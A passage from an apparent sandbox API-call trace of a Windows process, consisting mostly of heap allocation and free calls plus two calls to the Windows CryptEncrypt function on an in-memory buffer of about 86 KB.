out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0204.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0204.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0204.785] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0204.786] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x150f1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x150f8) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0204.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0204.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0204.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0204.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0204.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0204.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0204.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0204.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0204.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0204.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0204.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0204.791] CharLowerBuffW (in: lpsz="byte[86264]", cchLength=0xb | out: lpsz="byte[86264]") returned 0xb [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0204.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0204.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0204.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f8) returned 0x2e95430 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0204.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0204.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0204.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f1) returned 0x2eaa530 [0204.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0204.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f1) returned 0x2ebf630 [0204.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0204.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0204.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0204.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0204.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0204.804] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0204.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0204.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0204.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0204.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0204.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0204.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c68 [0204.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0204.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0204.876] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0204.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0204.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54148 [0204.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0204.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0204.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0204.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0204.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0204.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0204.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0204.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0204.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0204.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0204.877] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e95430*, pdwDataLen=0x8cef60*=0x150f1, dwBufLen=0x150f8 | out: pbData=0x2e95430*, pdwDataLen=0x8cef60*=0x150f8) returned 1 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.881] HeapFree (in: hHeap=0x970000, 